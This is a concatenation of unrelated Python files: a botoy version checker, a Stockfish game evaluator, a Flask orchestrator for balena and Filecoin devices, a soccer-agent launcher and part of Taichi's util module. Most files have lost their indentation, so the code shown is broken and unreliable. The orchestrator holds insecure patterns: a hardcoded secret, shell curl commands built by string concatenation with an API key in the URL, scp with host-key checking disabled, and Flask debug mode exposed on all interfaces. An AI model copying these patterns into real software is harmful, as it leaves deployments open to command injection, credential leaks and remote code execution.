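    lines = run_shell_command(f"cat {path} | " + sed_command(replacements))
    if lines is False:
        logger.log("substitution failed", is_error=True)
    return lines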
|
__version__.py
|
# pylint: disable=C0415,C0413
__version__ = '0.0.25'
def check_version():
def _check_version():
import re
from distutils.version import LooseVersion as V
import httpx
try:
resp = httpx.get(
'https://mirrors.aliyun.com/pypi/simple/botoy/', timeout=10
)
resp.raise_for_status()
except Exception:
pass
else:
versions = re.findall(r'botoy-(.*?)\.tar\.gz', resp.text)
if versions:
versions = set(versions)
local_v = V(__version__)
latest_version = max(V(v) for v in versions)
if local_v < latest_version:
info = f'\033[33m==== Current version: \033[31m{local_v}\033[33m, latest available: \033[31m{latest_version}\033[33m, please update! ====\033[0m'
print(info)
from threading import Thread
t = Thread(target=_check_version)
t.daemon = True
t.start()
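# --- note (sketch, not used above) -------------------------------------------
# distutils.version.LooseVersion is deprecated and distutils is removed in
# Python 3.12. The same comparison can be expressed with the third-party
# "packaging" library, assuming it is available:
def _compare_versions(local: str, candidates):
    from packaging.version import Version
    latest = max(Version(v) for v in candidates)
    return Version(local) < latest, str(latest)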
|
stockfish_eval.py
|
import os
import chess, chess.uci, chess.pgn
import numpy as np
import threading
class StockfishEval:
"""
Evaluates board positions from a .pgn file in parallel.
Saves a npy dictionary of FEN positions and their Stockfish evaluations.
"""
def __init__(self,
stockfish_exe,
pgn_file,
score_dict_filename,
threads,
export_inc):
if not str(score_dict_filename).endswith('.npy'):
score_dict_filename += '.npy'
self.stockfish_exe = stockfish_exe
self.pgn_file = pgn_file
self.score_dict_filename = score_dict_filename
self.threads = int(threads)
self.export_inc = export_inc
self.score_dict = {}
self.import_hash_table('threads\\FICS\\known_scores_merged.npy')
def import_hash_table(self, dict_file):
# Attempt to load already processed boards
if os.path.isfile(dict_file):
self.score_dict = np.load(dict_file, allow_pickle=True).item()
print('Imported hash table of length {}'.format(len(self.score_dict)))
else:
print('No hash table found. Creating new hash table.')
def export_hash_table(self):
np.save(self.score_dict_filename, self.score_dict)
def eval_thread(self, thread_num, pgn_file=None):
engine = chess.uci.popen_engine(self.stockfish_exe)
if pgn_file is None:
pgn = open(self.pgn_file)
else:
pgn = open(pgn_file)
def export_thread_hash_table():
print('Saving progress for thread {} len: {}'.format(thread_num, len(thread_score_dict)))
filename = str(self.score_dict_filename) + '_' + str(thread_num) + '.npy'
np.save('threads\\' + filename, thread_score_dict)
engine.uci()
engine.setoption({"Threads": 1, "Hash": 64})
info_handler = chess.uci.InfoHandler()
engine.info_handlers.append(info_handler)
game_num = 0
games_processed_by_thread = 0
if pgn_file is None:
while game_num < thread_num:
chess.pgn.skip_game(pgn)
game_num += 1
game = chess.pgn.read_game(pgn)
thread_score_dict = {}
while game is not None:
board = game.board()
engine.ucinewgame()
print('Processing game {} on thread {}'.format(game_num, thread_num))
move_number = 0
for move in game.mainline_moves():
board.push(move)
# Check if board has already been evaluated
if board.fen() not in self.score_dict and \
board.fen() not in thread_score_dict:
engine.position(board)
try:
engine.go(depth=12, ponder=False)
except chess.uci.EngineTerminatedException as err:
print('Unexpected engine error:')
print(err)
engine.stop()
print(info_handler.info['score'][1][0])
print('----')
score = info_handler.info['score'][1].cp
mate = info_handler.info['score'][1].mate
# If Stockfish finds mate, then give an extreme score
if mate is not None:
if mate > 0:
if board.turn:
score = 10000
else:
score = -10000
else:
if board.turn:
score = -10000
else:
score = 10000
elif not board.turn:
# Engine scores are from the side to move; flip to White's perspective on Black's turn
score *= -1
thread_score_dict[board.fen()] = score
move_number += 1
# game = chess.pgn.read_game(self.pgn)
if pgn_file is None:
skip_to = self.threads + game_num
while game_num < skip_to:
chess.pgn.skip_game(pgn)
game_num += 1
else:
game_num += 1
game = chess.pgn.read_game(pgn)
games_processed_by_thread += 1
if games_processed_by_thread % self.export_inc == 0:
export_thread_hash_table()
def execute_parallel_eval(self):
procs = []
# If pgn_file is a list of pgn's then assign them to threads.
if type(self.pgn_file) is list:
for i in range(self.threads):
thread_pgn = self.pgn_file[i]
print('Thread ' + str(i) + ' started. PGN: ' + str(thread_pgn))
p = threading.Thread(target=self.eval_thread, args=(i, thread_pgn))
procs.append(p)
p.start()
else:
for i in range(self.threads):
print('Thread ' + str(i) + ' started.')
# p = Process(target=self.eval_thread, args=(i, ))
p = threading.Thread(target=self.eval_thread, args=(i,))
procs.append(p)
p.start()
for proc in procs:
proc.join()
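# --- illustration (sketch, not used by the class above) -----------------------
# The score handling inside eval_thread(), pulled out as a standalone helper:
# Stockfish reports scores from the side to move, so centipawn values are
# flipped on Black's turn, and forced mates are clamped to +/-10000.
def score_from_engine(cp, mate, white_to_move):
    """Return a centipawn score from White's perspective."""
    MATE_SCORE = 10000
    if mate is not None:
        return MATE_SCORE if (mate > 0) == white_to_move else -MATE_SCORE
    return cp if white_to_move else -cp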
if __name__ == '__main__':
evaluator = StockfishEval('Stockfish\\stockfish_10_x64.exe',
'data\\FICS\\ficsgamesdb_2017_chess2000_nomovetimes_80572.pgn',
'centipawn_scores',
16,
75,)
evaluator.execute_parallel_eval()
|
app2.py
|
from flask import request, Flask
from flask_restful import Resource, Api
import os
import subprocess
import requests
from threading import Thread
import json
import time
import yaml
# TODO differentiate between service_name used in balena and image_name used for filecoin
# TODO better comments
EDGE_IP_ADDRESS = "https://a6df793906bb9a28dc45199d4ed42843.balena-devices.com/"
CLOUD_HOST = "http://150.140.184.241:1880"
# MINER_ADDRESS = "ASSDF"
PORT = os.getenv("PORT", "80")
SECRET = "super_secret"
ID = "1234567890"
app = Flask(__name__)
api = Api(app)
@app.route('/orchestrator/service_customer/image/status', methods=['POST', 'GET'])
def service_customer_image():
if request.method == "POST":
message = request.json
image_status = message["status"]
image_name = message["imageName"]
image_hash = message["imageHash"]
miner_address = message["minerAddress"]
orchestrator.services_customer_contracts[image_name]["image_status"] = image_status
print(
f"Orchestrator -- Image { image_name} is {image_status} in the filecoin network")
if image_status == "stored":
thread = Thread(target=orchestrator.generate_contract_customer, args=(
image_name, image_hash, miner_address))
thread.start()
return "ok"
else:
return json.dumps(orchestrator.services_customer_contracts)
@app.route('/orchestrator/service_provider/image/status', methods=['POST'])
def service_provider_image():
if request.method == 'POST':
message = request.json
image_status = message["status"]
image_name = message["imageName"]
# image_hash = message["imageHash"]
if image_status == "downloaded":
thread = Thread(target=orchestrator.set_state)
thread.start()
return_message = "set_state()"
return_code = 200
else:
return_message = "unknown command"
return_code = 404
return return_message, return_code
# CONSUL HEALTH
@app.route('/orchestrator/health', methods=['GET'])
def orchestrator_health():
return "orchestrator v0.1", 200
@app.route('/orchestrator/contracts/debug', methods=['GET'])
def print_contracts():
data = {"service_provider": orchestrator.services_provider_contracts,
"service_customer": orchestrator.services_customer_contracts}
payload_str = json.dumps(data, indent=4)
return payload_str
# create_contract/testing --> wait(filecoin)--> /image_stored --> generate_contract_customer() --> /create_contract --> contract_setup()
# customer ENDPOINT
@app.route('/orchestrator/service_customer/contract/testing', methods=['POST', 'GET'])
def create_contract_debug():
# save file to filecoin_network
# this function should belong to the Orchestrator class and be called as part of the contract process,
# but for debugging it is called manually via a simple REST endpoint
if request.method == "POST":
data = request.json
image_name = data["imageName"]
service_provider_location = data["serviceProviderLocation"]
duration = data["storageDuration"]
miner_address = data["minerAddress"]
payload = {"image_name": image_name, "storage_duration": duration, "miner_address" : miner_address}
orchestrator.services_customer_contracts[image_name] = {
"contract_status": "pending", "image_status": "pending", "service_provider_location": service_provider_location}
thread = Thread(target=orchestrator.finterface_comm,
args=("POST", payload))
thread.start()
status = "ok"
code = 200
return status, code
else:
return json.dumps(orchestrator.services_customer_contracts)
# PROVIDER ENDPOINT
@app.route('/orchestrator/service_provider/contract', methods=['POST'])
def contract_provider():
data = request.json
print(data)
orchestrator.contract_setup(
data["imageName"], data["imageHash"], data["config"])
return "ok"
# Assumptions:
# 1) filecoin_interface and orchestrator share file directory
# 2) contract_setup --> finterface(request_file)--> file_downloaded --> load_image-->set state
class Orchestrator():
def __init__(self):
# self.miner_address = MINER_ADDRESS
self.services_provider_contracts = []
# [
# {
# "service_name": "",
# "config": {}
# }
# ]
self.services_customer_contracts = {}
# {
# "service1": {
# "contract_status":"pending,
# "image_status":"stored"
# }
# }
self.active_contracts = [] # same as contracts_services_provider
try:
with open("data/orchestrator_state_file.json")as f:
print("Orchestrator -- state file exists")
data = json.load(f)
self.services_provider_contracts = data["services_provider_contracts"]
self.services_customer_contracts = data["services_customer_contracts"]
i = 0
for service in self.services_provider_contracts:
self.stop_service(service["service_name"])
self.contract_interval(i)
i = i + 1
except FileNotFoundError:
print("Orchestrator - no file found, starting a fresh instance")
def _image2engine(self):
print("BalenaEngine API - load image")
def set_supervisor_state(self):
print("Supervisor API - set state")
self.balena_push()
def balena_push(self):
print("Communicate with node-RED backend - run docker-compose")
url = "http://150.140.184.249:1880/balena/push"
with open("data/docker-compose.yml", "r") as yaml_in:
compose = yaml.safe_load(yaml_in)
req = requests.post(url, json=compose)
status = req.status_code
print(f"Sent balena push command with response:{status}")
def start_service(self, service_name):
print("Orchestrator -- Supervisor API - start_service")
supervisor_url = os.environ["BALENA_SUPERVISOR_ADDRESS"]
key = os.environ["BALENA_SUPERVISOR_API_KEY"]
app_id = os.environ["BALENA_APP_ID"]
url = supervisor_url + f"/v2/applications/{app_id}/start-service?apikey={key}"
payload = "{\"serviceName\":\"" + service_name + "\"}"
while True:
try:
# req = requests.post(url=url, json=payload)
# status = req.status_code
command = 'curl --header "Content-Type:application/json"'
curl = command + ' "' + url + '"'
curl2 = curl + ' -d \'{"serviceName": "nodered-device-service"}\''
response = os.system(curl2)
if response == 0:
print(f"\nOrchestrator -- Started service {service_name}")
break
else:
print(
f"Orchestrator -- Tried starting service, got response: {response}, retrying in 10s")
except Exception as e:
print(
f"Orchestrator -- start service got error: {e}, retrying in 10s")
time.sleep(10)
# call to supervisor api
def stop_service(self, service_name):
print("Orchestrator -- Supervisor API - stop_service")
url = os.environ["BALENA_SUPERVISOR_ADDRESS"]
key = os.environ["BALENA_SUPERVISOR_API_KEY"]
app_id = os.environ["BALENA_APP_ID"]
url = url + f"/v2/applications/{app_id}/stop-service?apikey={key}"
payload = "{\"serviceName\":\"" + service_name + "\"}"
while True:
try:
command = 'curl --header "Content-Type:application/json"'
curl = command + ' "' + url + '"'
curl2 = curl + ' -d \'{"serviceName": "nodered-device-service"}\''
curl3 = curl + ' -d \'{"serviceName": "lora-appserver"}\''
response2 = os.system(curl2)
response3 = os.system(curl3)
# req = requests.post(url=url, json=payload)
# status = req.status_code
if response2 == 0 and response3 ==0:
print(f"\nOrchestrator -- Stopped service {service_name}")
break
else:
print(
f"Orchestrator -- Tried stopping service, got response: {response2}, {response3}, retrying in 10s")
except Exception as e:
print(
f"Orchestrator -- stop service got error: {e}, retrying in 10s")
time.sleep(10)
def finterface_comm(self, method, payload):
if method == "POST":
req = requests.post(url="http://127.0.0.1:" + PORT +
"/filecoin_interface/orchestrator/image", json=payload)
elif method == "GET":
req = requests.get(url="http://127.0.0.1:" + PORT +
"/filecoin_interface/orchestrator/image", params=payload)
print(req)
return 0
# call to filecoin interface service
# /filecoin_interface/orchestrator/ [get_image, store_image]
# payload:
# get_image (image_hash, image_name, minerAddress)
# store_image (image_name, duration)
def contract_setup(self, image_name, image_hash, config):
new_service = {}
new_service["image_name"] = image_name
new_service["hash"] = image_hash
new_service["config"] = json.loads(config)
new_service["service_name"] = new_service["config"]["serviceName"]
self.services_provider_contracts.append(new_service)
# download image from filecoin network
payload = {"imageName": image_name, "imageHash": image_hash,
"minerAddress": new_service["config"]["miner_address"]}
self.finterface_comm("GET", payload)
return 0
def contract_interval(self, index):
p = Thread(target=self.check_contract, args=[index])
p.start()
return 0
def check_contract(self, index):
service = self.services_provider_contracts[index]
interval = int(service["config"]["event"]["interval"])
while True:
try:
r = requests.get(
url=service["config"]["event"]["ip"] + "/orchestrator/health", timeout=10)
if r.status_code == 200:
print(
"Service Provider orchestrator checked for event, everything OK")
else:
return_code = r.status_code
print(f"Node is online but return code is : {return_code}")
raise requests.exceptions.Timeout
except requests.exceptions.Timeout:
print (f"Activating insurance contract..")
self.services_provider_contracts.remove(service)
self.active_contracts.append(service)
self.save_orchestrator_state()
self.start_service(service["service_name"])
break
time.sleep(interval)
def generate_contract_customer(self, image_name, image_hash, miner_address):
with open('data/new_service_config.json', encoding='utf-8') as f:
config = json.load(f)
config["miner_address"] = miner_address
config["event"]["ip"] = EDGE_IP_ADDRESS
configs = json.dumps(config)
self.services_customer_contracts[image_name]["image_status"] = "stored"
service_provider_location = self.services_customer_contracts[
image_name]["service_provider_location"]
payload = {"imageName": image_name,
"imageHash": image_hash, "config": configs}
r = requests.post(url=service_provider_location +
"/orchestrator/service_provider/contract", json=payload)
if r.status_code == 200:
self.services_customer_contracts[image_name]["contract_status"] = "inactive"
return 0
# if image is stored, send hash + to create_contract of other orchestrator
def save_device_state(self):
# get device_state
# append new state
# save overall state
with open('data/current_state.json', encoding='utf-8') as f:
self.target_state = json.load(f)
with open('data/new_service_state.json') as f:
new_service = json.load(f)
self.target_state["state"]["local"]["apps"]["1"]["services"].append(
new_service)
with open('data/new_state.json', 'w', encoding='utf-8') as f:
json.dump(self.target_state, f, ensure_ascii=False, indent=4)
service_name = new_service["serviceName"]
print(f"Device state updated with service: {service_name}")
return 0
def save_orchestrator_state(self):
self.orch_state = {}
self.orch_state["services_provider_contracts"] = self.services_provider_contracts
self.orch_state["services_customer_contracts"] = self.services_customer_contracts
self.orch_state["active_contracts"] = self.active_contracts
with open('data/orchestrator_state_file.json', 'w', encoding='utf-8') as fp:
json.dump(self.orch_state, fp, ensure_ascii=False, indent=4)
print("Orchestrator state saved to file \"data/orchestrator_state_file.json\" ")
return 0
def set_state(self):
# self.save_device_state()
self.save_orchestrator_state()
self.set_supervisor_state()
return 0
# requests to supervisor for new state
# _balena_push()
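# --- illustration (sketch, not wired into the class above) --------------------
# start_service()/stop_service() currently shell out to curl via os.system().
# The same supervisor call could be made with the requests library already
# imported in this module; the environment variables are the ones the methods
# above rely on, and "action" is "start" or "stop".
def _supervisor_service_call(action: str, service_name: str) -> int:
    supervisor = os.environ["BALENA_SUPERVISOR_ADDRESS"]
    key = os.environ["BALENA_SUPERVISOR_API_KEY"]
    app_id = os.environ["BALENA_APP_ID"]
    url = f"{supervisor}/v2/applications/{app_id}/{action}-service?apikey={key}"
    resp = requests.post(url, json={"serviceName": service_name}, timeout=10)
    return resp.status_code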
####### Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface #######
### API START####### API START####### API START###### API START###### API START###### API START###### API START####
@app.route('/filecoin_interface/backend/image', methods=['POST', 'GET'])
def filecoin_interface_image():
message = request.json
# print(f" Filecoin Interface -- Received request from backend: {message}")
if request.method == "POST":
image_hash = message["imageHash"]
image_name = message["imageName"]
image_status = message["imageStatus"]
miner_address = message["miner_address"]
if image_status == "ready2download":
print(
f" Filecoin Interface -- Image with hash [ {image_hash} ] and name [ {image_name} ] is ready to be downloaded")
scp_thread = Thread(target=scp_image, args=(
"download", image_name, image_hash, 0))
scp_thread.start()
status = "Started scp download"
status_code = 200
else: #stored, committed
communicate_orchestrator(
image_status, {"imageHash": image_hash, "imageName": image_name, "minerAddress":miner_address})
status = "data received"
status_code = 200
else:
status = "FUNCTIONALITY NOT FOUND"
status_code = 404
return status, status_code
@app.route('/filecoin_interface/backend/error', methods=['POST'])
def error_log():
message = request.json
error_object = message["errorObject"]
error_code = error_object["code"]
error_message = error_object["message"]
print(
f" Filecoin Interface -- Received error from backend:\nMessage: {error_message}Code: {error_code}")
return "error logged"
@app.route('/filecoin_interface/orchestrator/image', methods=['POST', 'GET'])
def orchestrator_store_image():
if request.method == "POST":
data = request.json
image_name = data["image_name"]
storage_duration = data["storage_duration"]
miner_address = data["miner_address"]
print(
f" Filecoin Interface -- \nReceived request from orchestrator: {data}")
scp_thread = Thread(target=scp_image, args=(
"upload", image_name, storage_duration, miner_address))
scp_thread.start()
status = "Started scp upload"
status_code = 200
else:
image_name = request.args.get('imageName')
image_hash = request.args.get('imageHash')
miner_address = request.args.get('minerAddress')
payload = {"imageName": image_name, "imageHash": image_hash,
"minerAddress": miner_address, "ipAddress": EDGE_IP_ADDRESS}
communicate_backend("get_image", payload)
status = f"requested image: {image_name} with hash: {image_hash} from the filecoin network"
status_code = 200
return status, status_code
#### END OF API ######### END OF API ######### END OF API ######### END OF API ######### END OF API #####
@app.route('/filecoin_interface/health', methods=['GET'])
def filecoin_interface_health():
return "Filecoin Interface v0.1", 200
def communicate_orchestrator(topic, datum):
# topic = image_committed, image_stored, image_downloaded
# Inform orchestrator that image has been committed
# Inform orchestrator that image has been stored in the network
# Inform orchestrator that image has been downloaded
orchestrator_url = "http://localhost:" + PORT + "/orchestrator/"
datum["status"] = topic
if topic == "downloaded":
orchestrator_url = orchestrator_url + "service_provider/image/status"
else: # topic = stored, committed
orchestrator_url = orchestrator_url + "service_customer/image/status"
payload_str = json.dumps(datum, indent=4)
print(
f" Filecoin Interface -- communicate_orchestrator(), request: {payload_str}")
req = requests.post(orchestrator_url, json=datum)
print(
f" Filecoin Interface -- Communicate_orchestrator(), response: {req}")
return req.status_code
def communicate_backend(topic, datum):
# topic = get_image, store_image
payload = {"id": ID, "secret": SECRET, "data": datum}
payload_str = json.dumps(payload, indent=4)
print(
f" Filecoin Interface -- Sending request to backend with payload: {payload_str}")
req = requests.post(CLOUD_HOST + "/" + topic, json=payload)
print(f" Filecoin Interface -- Response from backend: {req}")
return req.status_code
def scp_image(action, image_name, argument1, argument2):
path = "/home/ubuntu/filecoin_images/"
if action == "download":
command_part_1 = "ubuntu@150.140.184.241:" + path + image_name
command_part_2 = os.getcwd() + "/data/images"
command_part_3 = os.getcwd() + "/data/odyslam_ubuntu.pem"
print("\n### SCP PROCESS START ###")
p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no',"-i", command_part_3, command_part_1, command_part_2])
return_code = p.wait()
print("### SCP END ####")
if return_code != 0:
print(f"Filecoin Interface -- scp produced error {return_code}")
return 1
else:
print(f"Filecoin Interface -- file with {image_name} was downloaded using scp")
payload = {"imageHash": argument1, "imageName": image_name}
communicate_orchestrator("downloaded", payload)
# As soon as image is downloaded, inform orchestrator so as to acquire it
elif action == "upload":
print("\n### SCP PROCESS START (new version0) ###\n")
command_part_2 = "ubuntu@150.140.184.241:" + path
command_part_1 = os.getcwd() + "/data/images/" + image_name
command_part_3 = os.getcwd() + "/data/odyslam_ubuntu.pem"
p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no', "-i",command_part_3,command_part_1, command_part_2])
return_code = p.wait()
print("### SCP END ####")
if return_code != 0:
print(f"Filecoin Interface -- scp produced error {return_code}")
return 1
else:
print(f"Filecoin Interface -- file with {image_name} was uploaded using scp")
payload = {"duration": argument1, "imageName": image_name, "minerAddress": argument2, "ipAddress": EDGE_IP_ADDRESS}
communicate_backend("store_image", payload)
# As soon as image is uploaded to the remote server, inform backend
# so as to start upload to filecoin network
else:
print("Wrong command for scp")
return 0
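# --- illustration (sketch) -----------------------------------------------------
# The scp invocation above, expressed with subprocess.run(), which raises on a
# non-zero exit code and supports a timeout. src/dst/key_file are the same kind
# of values scp_image() builds; nothing here is called by the code above.
def _scp(src: str, dst: str, key_file: str, timeout: int = 300) -> bool:
    try:
        subprocess.run(
            ["scp", "-o", "StrictHostKeyChecking=no", "-i", key_file, src, dst],
            check=True, timeout=timeout)
        return True
    except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as exc:
        print(f"Filecoin Interface -- scp failed: {exc}")
        return False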
# def scp_image(action, image_name, argument):
# path = "/home/ubuntu/filecoin_images/"
# if action == "download":
# command_part_1 = "ubuntu@150.140.184.241:" + path + image_name
# command_part_2 = os.getcwd() + "data/images"
# command_part_3 = "-i " + os.getcwd() + "/data/odyslam_ubuntu.pem"
# print("\n### SCP PROCESS START ###")
# # p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no','-o UserKnownHostsFile=/dev/null',command_part_3, command_part_1, command_part_2])
# # return_code = p.wait()
# time.sleep(4)
# print("...File sent")
# print("### SCP END ####")
# # if return_code != 0:
# # print(f"Filecoin Interface -- scp produced error {return_code}")
# # return 1
# # As soon as image is downloaded, inform orchestrator
# # so as to acquire it
# payload = {"imageHash": argument, "imageName": image_name}
# communicate_orchestrator("downloaded", payload)
# elif action == "upload":
# print("\n### SCP PROCESS START ###\n")
# return_value = os.system("scp -o StrictHostKeyChecking=no -i /usr/src/app/data/odyslam_ubuntu.pem /usr/src/app/data/images/hello.txt ubuntu@150.140.184.241:/home/ubuntu/filecoin_images/")
# print(return_value)
# command_part_2 = "ubuntu@150.140.184.241:" + path
# command_part_1 = os.getcwd() + "data/images/" + image_name
# command_part_3 = "-i " + os.getcwd() + "/data/odyslam_ubuntu.pem"
# p = subprocess.Popen(['scp','-o StrictHostKeyChecking=no','-o UserKnownHostsFile=/dev/null', command_part_3,command_part_1, command_part_2])
# return_code = p.wait()
# print(return_code)
# print("### SCP END ####")
# # if return_code != 0:
# # print(f"Filecoin Interface -- scp produced error {return_code}")
# # return 1
# # As soon as image is uploaded to the remote server, inform backend
# # so as to start upload to filecoin network
# payload = {"duration": argument, "imageName": image_name}
# communicate_backend("store_image", payload)
# else:
# print("Wrong command for scp")
# return 0
####### Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface ############## Filecoin Interface #######
def register_health():
while True:
try:
url = "http://edgex-core-consul:8500/v1/agent/service/register?replace-existing-checks=1"
payload = {
"ID": "filecoin",
"Name": "Filecoin Inteface",
"Port": 80,
"EnableTagOverride": False,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"HTTP": "http://orchestrator:" + PORT + "/filecoin_interface/health",
"Interval": "125s",
},
"Weights": {
"Passing": 10,
"Warning": 1
}
}
req = requests.put(url, json=payload)
print(f"Filecoin Service registered with Consul. Response: {req}")
payload = {
"ID": "orchestrator",
"Name": "Orchestrator",
"Port": 80,
"EnableTagOverride": False,
"Check": {
"DeregisterCriticalServiceAfter": "90m",
"HTTP": "http://orchestrator:" + PORT + "/orchestrator/health",
"Interval": "120s",
},
"Weights": {
"Passing": 10,
"Warning": 1
}
}
req = requests.put(url, json=payload)
print(f"Orchestrator Service registered with Consul. Response: {req}")
break
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
print(f"Register Health: got exception:{e}, retrying in 20s")
time.sleep(20)
if __name__ == '__main__':
orchestrator = Orchestrator()
thread = Thread(target = register_health)
thread.start()
app.run(host='0.0.0.0', port=PORT, debug=True)
|
main.py
|
#!/usr/bin/env python
import threading
import time
import random
import sys
import multiprocessing as mp
import os
# import agent types (positions)
from aigent.soccerpy.agent import Agent as A0
# strikers
from aigent.agent_1 import Agent as A1
# defenders
from aigent.agent_2 import Agent as A2
# goalie
from aigent.agent_3 import Agent as A3
# set team
TEAM_NAME = 'Keng'
NUM_PLAYERS = 5
if __name__ == "__main__":
# return type of agent: midfield, striker etc.
def agent_type(position):
return {
2: A1,
3: A1,
4: A1,
6: A1,
7: A1,
8: A1,
}.get(position, A1)
# spawn an agent of team_name, with position
def spawn_agent(team_name, position):
"""
Used to run an agent in a separate physical process.
"""
# return type of agent by position, construct
a = agent_type(position)()
a.connect("localhost", 6000, team_name)
a.play()
# we wait until we're killed
while 1:
# we sleep for a good while since we can only exit if terminated.
time.sleep(1)
# spawn all agents as separate processes for maximum processing efficiency
agentthreads = []
for position in xrange(1, NUM_PLAYERS+1):
print " Spawning agent %d..." % position
at = mp.Process(target=spawn_agent, args=(TEAM_NAME, position))
at.daemon = True
at.start()
agentthreads.append(at)
print "Spawned %d agents." % len(agentthreads)
print
print "Playing soccer..."
# wait until killed to terminate agent processes
try:
while 1:
time.sleep(0.05)
except KeyboardInterrupt:
print
print "Killing agent threads..."
# terminate all agent processes
count = 0
for at in agentthreads:
print " Terminating agent %d..." % count
at.terminate()
count += 1
print "Killed %d agent threads." % (count - 1)
print
print "Exiting."
sys.exit()
|
util.py
|
import atexit
import os
import shutil
import sys
import ctypes
if sys.version_info < (3, 6):
print("\nPlease restart with python3. \n(Taichi supports Python 3.6+)\n")
print("Current version:", sys.version_info)
exit(-1)
tc_core = None
def in_docker():
if os.environ.get("TI_IN_DOCKER", "") == "":
return False
else:
return True
def import_tc_core():
global tc_core
old_flags = sys.getdlopenflags()
sys.setdlopenflags(258)  # 258 = RTLD_NOW | RTLD_GLOBAL
# import the compiled core while RTLD_GLOBAL is in effect so its symbols are shared
import taichi_core as core
tc_core = core
sys.setdlopenflags(old_flags)
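# --- illustration (sketch, not used above) -------------------------------------
# The magic number 258 equals RTLD_NOW (2) | RTLD_GLOBAL (256) on Linux. The
# same effect can be expressed with the symbolic constants from the os module
# (POSIX only), which also stays correct on platforms where the numeric values
# differ:
def _with_global_dlopen(import_fn):
    old_flags = sys.getdlopenflags()
    try:
        sys.setdlopenflags(os.RTLD_NOW | os.RTLD_GLOBAL)
        return import_fn()
    finally:
        sys.setdlopenflags(old_flags)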
def is_ci():
return os.environ.get('TC_CI', '') == '1'
def package_root():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), '../')
def is_release():
return os.environ.get('TAICHI_REPO_DIR', '') == ''
from colorama import Fore, Back, Style
def get_core_shared_object():
if is_release():
directory = os.path.join(package_root(), 'lib')
else:
directory = get_bin_directory()
return os.path.join(directory, 'libtaichi_core.so')
def get_repo():
from git import Repo
import taichi as tc
repo = Repo(tc.get_repo_directory())
return repo
def print_red_bold(*args, **kwargs):
print(Fore.RED + Style.BRIGHT, end='')
print(*args, **kwargs)
print(Style.RESET_ALL, end='')
def format():
import os
import taichi as tc
from yapf.yapflib.yapf_api import FormatFile
repo = get_repo()
print('* Formatting code', end='')
for item in repo.index.diff('HEAD'):
fn = os.path.join(tc.get_repo_directory(), item.a_path)
print(end='.')
if fn.endswith('.py'):
FormatFile(
fn,
in_place=True,
style_config=os.path.join(tc.get_repo_directory(), '.style.yapf'))
if fn.endswith('.cpp'):
os.system('clang-format -i -style=file {}'.format(fn))
repo.git.add(item.a_path)
print('* Done!')
from taichi.misc.settings import get_output_directory, get_build_directory, get_bin_directory, get_repo_directory, get_runtime_directory
from taichi.misc.util import get_os_name, get_unique_task_id
CREATE_SAND_BOX_ON_WINDOWS = True
def build():
tmp_cwd = os.getcwd()
bin_dir = get_build_directory()
os.makedirs(bin_dir, exist_ok=True)
os.chdir(bin_dir)
flags = ' -DPYTHON_EXECUTABLE:FILEPATH="{}"'.format(sys.executable)
print('Running cmake...')
if is_ci():
print(' Note: building for CI. SIMD disabled.')
flags += ' -DTC_DISABLE_SIMD:BOOL=1'
if get_os_name() == 'win':
flags += ' -G "Visual Studio 15 Win64"'
cmake_ret = os.system('cmake .. ' + flags)
if cmake_ret != 0:
print(' Error: CMake failed.')
exit(-1)
import multiprocessing
print('Building taichi...')
num_make_threads = min(20, multiprocessing.cpu_count())
if get_os_name() == 'win':
make_ret = os.system("msbuild /p:Configuration=Release /p:Platform=x64 /m taichi.sln")
else:
make_ret = os.system('make -j {}'.format(num_make_threads))
if make_ret != 0:
print(' Error: Build failed.')
exit(-1)
os.chdir(tmp_cwd)
if is_release():
print("[Release mode]")
sys.path.append(os.path.join(package_root(), 'lib'))
link_src = os.path.join(package_root(), 'lib', 'taichi_core.so')
link_dst = os.path.join(package_root(), 'lib', 'libtaichi_core.so')
if not os.path.exists(link_dst):
os.symlink(link_src, link_dst)
import_tc_core()
# For llvm jit to find the runtime symbols
dll = ctypes.CDLL(get_core_shared_object(), mode=ctypes.RTLD_GLOBAL)
tc_core.set_python_package_dir(package_root())
os.makedirs(tc_core.get_repo_dir(), exist_ok=True)
else:
if get_os_name() == 'osx':
bin_dir = get_bin_directory()
os.environ['DYLD_FALLBACK_LIBRARY_PATH'] = get_runtime_directory()
if not os.path.exists(os.path.join(bin_dir, 'libtaichi_core.dylib')):
build()
tmp_cwd = os.getcwd()
os.chdir(bin_dir)
shutil.copy('libtaichi_core.dylib', 'taichi_core.so')
sys.path.append(bin_dir)
import taichi_core as tc_core
os.chdir(tmp_cwd)
elif get_os_name() == 'linux':
bin_dir = get_bin_directory()
if 'LD_LIBRARY_PATH' in os.environ:
os.environ['LD_LIBRARY_PATH'] += ':/usr/lib64/'
else:
os.environ['LD_LIBRARY_PATH'] = '/usr/lib64/'
if not os.path.exists(os.path.join(bin_dir, 'libtaichi_core.so')):
build()
tmp_cwd = os.getcwd()
os.chdir(bin_dir)
sys.path.append(bin_dir)
# https://stackoverflow.com/questions/3855004/overwriting-library-file-causes-segmentation-fault
if os.path.exists('taichi_core.so'):
try:
os.unlink('taichi_core.so')
except:
print('Warning: taichi_core.so already removed. This may be caused by '
'simultaneously starting two taichi instances.')
pass
shutil.copy('libtaichi_core.so', 'taichi_core.so')
try:
import_tc_core()
except Exception as e:
from colorama import Fore, Back, Style
print_red_bold("Taichi core import failed: ", end='')
print(e)
exit(-1)
os.chdir(tmp_cwd)
elif get_os_name() == 'win':
bin_dir = get_bin_directory()
dll_path1 = os.path.join(bin_dir, 'Release', 'taichi_core.dll')
dll_path2 = os.path.join(bin_dir, 'libtaichi_core.dll')
if not os.path.exists(dll_path1) and not os.path.exists(dll_path2):
build()
# On Windows, once a dll/pyd is loaded, we can no longer write to it
old_wd = os.getcwd()
os.chdir(bin_dir)
if CREATE_SAND_BOX_ON_WINDOWS:
# Create a sandbox for separated core lib development and loading
dir = os.path.join(get_output_directory(), 'tmp', get_unique_task_id())
lib_dir = os.path.join(get_repo_directory(), 'external', 'lib')
os.environ['PATH'] += ';' + lib_dir
os.makedirs(dir)
if os.path.exists(dll_path1):
shutil.copy(dll_path1, os.path.join(dir, 'taichi_core.pyd'))
else:
